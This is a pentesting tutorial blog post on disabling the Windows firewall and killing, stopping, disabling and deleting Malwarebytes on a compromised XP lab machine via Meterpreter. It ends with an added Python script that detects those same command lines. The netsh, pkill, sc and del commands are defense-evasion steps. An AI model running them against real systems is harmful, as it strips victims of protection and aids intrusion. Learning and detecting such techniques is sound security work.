Firewall and Anti-virus concepts - Metasploit Part 4

Firewall and Antivirus Concepts



Hey folks, back again with the series. Here we are going to learn how to disable the firewall and antivirus on the target Windows XP machine.

I strongly recommend you go through the previous blog posts in order to understand what we are about to discuss.

So, considering that we have already exploited the target machine, now it's time to disable the firewall on the target Windows XP machine. But before that, let's perform an nmap firewall detection scan on it.

Command :

sudo nmap -sA [target ip] --reason -T4

Fig : 1.1


So in Fig : 1.1 we can see that we get responses only from ports 139 and 445, because file and printer sharing is enabled on the target system. But what if we want to scan and exploit ports behind the firewall? We have no option but to turn off the firewall, right? So let's do it through the Meterpreter session.

Command :

netsh firewall set opmode mode=DISABLE

Fig : 1.2


In Fig : 1.2 we can see that we were able to run the command successfully. So let's see if it actually worked on the target machine.

Fig : 1.3


In Fig : 1.3 we can see that our command worked great, and I swear I haven't turned it off manually :) You can try it yourselves.

So the firewall is turned off. Let's perform the firewall detection scan again on the target machine.

Command :

sudo nmap -sA [target_ip] --reason -T4

Fig : 1.4



In Fig : 1.4 we can see that the scan concludes that all 1000 ports are unfiltered!

And similarly, you can turn it back on as well.

Command :

netsh firewall set opmode mode=ENABLE

Fig : 1.5


Ending Antivirus process

So first, let's list the processes on the target machine.

Command :

ps

Fig : 1.6



In Fig : 1.6 we can see that there is anti-malware software named Malwarebytes Anti-Malware running on the target machine.

To view only the Malwarebytes processes, we can filter them by name.

Command :

pgrep mbam

Fig : 1.7


So in Fig : 1.7 we can see that there are exactly 3 processes running on the target machine that are related to the Malwarebytes software.

Now let's use the kill command to kill the processes. Wait, you know what, we can use pkill to kill all the processes by name.

Command :

pkill mbam

Fig : 1.8


In Fig : 1.8 we can see that all the processes related to Malwarebytes have been killed!

So did we succeed in killing the anti-malware software?

Let's see by listing the processes again.

Fig : 1.9



In Fig : 1.9 the Malwarebytes processes did not get respawned. But there are cases where they get respawned again and again after killing them.

I feel like those kinds of processes have more lives than the Undertaker.




Even if we kill the processes again, they will respawn again and again. Yes, some anti-virus processes might have a threshold limit and stop respawning, but some are never gonna give up.


So if you are caught up in a situation like that, then let's go the other way and stop the service.

So for instance, let's say that the Malwarebytes process is getting respawned again.

Get into the shell of the target machine and follow along.

Make sure you are at the location C:\Windows\system32 and you have SYSTEM level privileges.

Command :

sc query

Search for the service that's running.

In my case it is MBAMService.exe

Command :

sc stop "MBAMService"

This stops the service.

We should not only stop the service, we should also make sure that it won't be able to start if the machine is rebooted.

Command :

sc config "MBAMService" start= disabled

This command disables the service and won't let it start on boot.

And finally, you can view the status of the service.

Command :

sc query "MBAMService"

But let's say that this method did not work for you, or you couldn't stop your service because it is non-stoppable, or you are just being paranoid. Then the other method is to simply rename the service file so that other processes can't execute it, which prevents it from respawning.

First go to C:\Program Files and then search for the folder of your anti-virus service, which is Malwarebytes in my case. Refer to Fig : 2.0.

Fig : 2.0



Now get into the folder and search for the service file.

Fig : 2.1


In Fig : 2.1 we can see the name of the service file, which is mbamservice.exe in my case.

Now don't delete the file directly; we don't want to damage property while performing a pentest, do we? So first make a backup file before deleting it.

Command :

copy mbamservice.exe mbamservice.exe.bak

Now that we have the backup file, we can delete the actual file.

Command :

del mbamservice.exe

And boom! If you try to execute the anti-malware software again, it's just gonna try to search for and execute mbamservice.exe, which isn't actually present on the target machine. After a few tries, when it reaches its threshold, it simply returns a dialogue box which looks something like Fig : 2.2, and the same happens if we reboot the machine.

Fig : 2.2


And so these are some of the techniques we can use to get rid of firewall and anti-virus software :)
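As an added example from the defender's side (not code from the original post): every step above, the netsh opmode change, sc stop, sc config start= disabled and the del of the service binary, is a command line that lands in the target's process-creation logs. This Python script runs a few detection rules over constructed sample command lines in that shape; the PROTECTED_NAMES list, the rule names and the sample lines are assumptions made for this example.

```python
import re

# Watched security products (constructed list; the page's case is Malwarebytes).
PROTECTED_NAMES = ("mbam", "malwarebytes")

# Rules run against a process-creation command line (Sysmon Event ID 1 / Security 4688 CommandLine).
RULES = {
    # legacy XP-era syntax from this page: netsh firewall set opmode mode=DISABLE
    "firewall_disabled": re.compile(
        r'\bnetsh\s+firewall\s+set\s+opmode\b.*\bmode\s*=\s*disable\b', re.I),
    # sc stop "<service>"
    "service_stopped": re.compile(
        r'\bsc(?:\.exe)?\s+stop\s+"?(?P<target>[\w.-]+)', re.I),
    # sc config "<service>" start= disabled
    "service_autostart_disabled": re.compile(
        r'\bsc(?:\.exe)?\s+config\s+"?(?P<target>[\w.-]+)"?\s+start\s*=\s*disabled\b', re.I),
    # del / erase / ren of an executable (backup-then-delete still trips this)
    "binary_removed": re.compile(
        r'\b(?:del|erase|ren|rename)\s+"?(?P<target>[^\s"]+\.exe)\b', re.I),
}

def is_protected(name: str) -> bool:
    """True when a service or file name refers to a watched security product."""
    return any(p in name.lower() for p in PROTECTED_NAMES)

def scan(command_lines: list[str]) -> list[dict[str, str]]:
    """One alert per matching command line. Firewall changes always alert;
    service/file rules alert only for watched products, so admin work stays quiet."""
    alerts = []
    for cmd in command_lines:
        for rule, pattern in RULES.items():
            m = pattern.search(cmd)
            if m is None:
                continue
            target = m.groupdict().get("target", "")
            if rule == "firewall_disabled" or is_protected(target):
                alerts.append({"rule": rule, "target": target, "command": cmd})
    return alerts

# Constructed sample command lines mirroring this page's steps plus benign noise;
# not captured from a real host.
SAMPLE_COMMAND_LINES = [
    "netsh firewall set opmode mode=DISABLE",
    "netsh firewall set opmode mode=ENABLE",
    'sc stop "MBAMService"',
    'sc config "MBAMService" start= disabled',
    "del mbamservice.exe",
    'sc stop "Spooler"',
]
```

Calling scan(SAMPLE_COMMAND_LINES) yields four alerts, one for each tampering step, while the ENABLE line and the Spooler stop stay quiet.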
